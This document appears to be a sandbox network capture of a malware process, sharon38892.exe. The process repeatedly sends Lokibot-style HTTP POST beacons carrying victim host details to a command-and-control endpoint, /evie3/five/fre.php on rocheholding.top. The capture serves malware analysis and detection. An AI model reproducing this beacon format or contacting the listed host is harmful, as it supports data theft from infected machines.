May 23, 2024 20:18:08.765249968 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRvZePXFPlkxEJVwKTTTijkbOB%2B333hVqmUBK2qYyKq0OVebdHBfoEq%2Fl9IrPi0KEl0O3sOXq12k0XNyVERdv1dLIgK%2Fz6T3GxVw%2Fh2W4noTQY6JTzMTRcZAw0cNo3ARZlC3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870bfabe478c36-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.22	49195	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:08.948107004 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:09.004693985 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:09.690977097 CEST	631	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rCEc%2FXVV0IoR5q20CC69i4UiC%2F4Nft2%2BljiEksV%2FQj0Ippy3Mi8Ic11V7nFgywaXKnOmJosJQ3PXZryQs0rKgkKmD2X%2FgKxNZmBrunIi%2BD2U6HJ%2BqDJpAZsA6ZZxG7vPDLfd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c009e118cba-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.22	49196	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:09.860809088 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:09.911942959 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:10.520375967 CEST	621	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hxKyChiHMDmb9YOgd4NX3IhzMauq8%2FGW90eeKt4NH0NJtg6NA7F0wCE8HrdSWYJrtAs7w2aTrW%2FnRhJcqP2xR54L50w4tNEdwgLkoAhEMj4fHmmnLAfUFfJDwIY6n4vn8EiW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c066e3e8c42-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.22	49197	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:10.679780960 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:10.732007027 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:11.463794947 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1YrzDTgbGTFNsJlybcqt3XkkIVlLK14HrW2WTCNv%2BdBCNhIakpaXbvoMdTr43r%2FAC8YwbIbPMRHoyqgWoMrIMlnTe7xK7i12pqSE10V%2FSP4%2FF%2BlLdXC95j94fQA9wXJ20ytj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c0baa0a7cb1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.22	49198	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:11.714251041 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:11.765513897 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:12.461520910 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nKEiPLJ%2FfYyZHRid%2BQFyaZ8gA150%2Bf7lDduR2eFQqc3PvjL0MsrPGjAOHmB%2FQemnzdD0X1crX34ZWAOmHgoxpPP9ll5XC4I15umm%2BaY%2BqU3gp3kYCr0gFOllxolxLq3WNAtQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c11fd177295-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.22	49199	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:16.270962000 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:16.327889919 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:17.009301901 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUemUkIusQoe2F3TNbZk748Wn%2Fw%2F5bSpQoUyJrLtdWvbBP7CMBPGtcXKLMxSSxMYmPf%2BO21IhF8q8FV9lfCH9MUj5yDtcJ2zcWKgINEPGR3wLEsPVIN4fumhyvqSwcKtXVxE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c2e4bc74213-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.22	49200	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:17.156368017 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:17.221688032 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:17.923675060 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YDutgQFFIxzNIKBvrlLi6JAd63W8y6IU71RakIQQh6%2F57n178FzVpHDbdIKj95tsqyTol2DABdh8dK2And2oKWtLXqnEIHWndFZT9RVezUx4kiOw7pGwJdj1q%2BQx6anp%2FY1P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c33e907425f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.22	49201	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:18.079750061 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:18.131640911 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:18.808876038 CEST	621	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5uUVRK43eaTncayfHBlitki2C6yzYkX8cFsRRoMCIUQaN9v6xXhg%2FnmCyUs3BtcAv9nVdk24DzZ5YdgMW02FgNwo5hd97A4juX608AOfWIlp%2B7Dpx0kYPbTUcThJFBhLgrz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c399db47c7b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.22	49202	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:18.976087093 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:19.027724028 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:19.808820963 CEST	631	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mgwJiYN2qcEqtPxRplNy%2FlBWaoy4aIWe5TxgEapQ4B%2B96ZumUL9FMG8ko0ybH9eIrzvDqmUJcLJNCuqHntiGITHElJ3Qs4ncPI2%2FcKFs%2BC%2FQ6LM8r1J%2BSs2CvLv6kn1FRk%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c3faa62c33a-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.22	49203	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:19.988815069 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:20.039690018 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:20.721458912 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2%2FAONJaM0ZWFEdxawbuwRHp7dPCBsszkfjaJ95ub5Z9gFqz9tE71AQ%2BuCqK5Dyrn%2Bp4P0Ge%2BVQiFreCHHnU6YgzUmEmXbxMXUfeAFc%2FWfFawD2O0FU4YIYj4mUY3aWRe7xw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c458ff317c1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.22	49204	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:20.882874012 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:20.935875893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:21.692867041 CEST	617	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eIJEuFPaZq6Vm9gdZBXJ3HYIhPvYAEmmx7vschgH8GHm32u4G1FQgiaks8dQ3W8CKiS4DVcdwN41CiV4i1RQEKyxoAgwHGvDSoDsMIKWh6FNECEj8Qz8aF5vXBvq8ixyGBbd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c4b399f43cb-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.22	49205	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:21.836224079 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:21.888267994 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:22.626806021 CEST	619	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sa6U57zeltuA09uNqaHqp9eCR1uZ%2Fqh69YEqbCjeFSVgrpWrrur0xPKbjYmj6bf0xtlPVVGlFQAnFug9GopTOJbBy0LIg0MtuYQ3m62SrQVwcGCOuACFRs3pAj3ydWCrfCsE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c512cf75e61-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.22	49206	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:22.772747993 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:22.823609114 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:23.512218952 CEST	621	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6WnGrbKfWZmhJ%2FXYCQDNZZL2roCxzHdeHG1WRmZC%2BmSiobCZQOdMwAUr3uGRo9qyQX5WgUx0idH3I1f4VyxL1C6EeTx45pcxm4Hw6F22F1ZjhQilQH5QtA9ryZwKBzybzxiw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c56ed1842c0-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.22	49207	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:23.674890041 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:23.724689007 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:24.406585932 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ufebBTowIZrNT3Yvyd%2Ba7EMX4vGhsWFikVZYuwhw63y%2BwvN5%2FESmkTHKPlddz541gwBkQBjLelPXRql29KtbVdbLZyhfZK29oNqFgKd%2FUiPJvaIrXr0BjtkX%2Fhe312FV3fyc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c5c9a120fa8-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.22	49208	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:24.566045046 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:24.619584084 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:25.323944092 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skR04UTVTnwWcgXK71cWplLkmzaplcGw5nNZ%2BaidaJ0NwocGXlJk2x0LnZm3RLLJUNwtwYWhI9Gn4wafIrsKGK51iXOOlwNqwXcHDoi%2F0pAQNqna%2BIupf%2F8ium6D%2FzAKMPxS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c622a945e6d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.22	49209	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:25.484709978 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:25.540275097 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
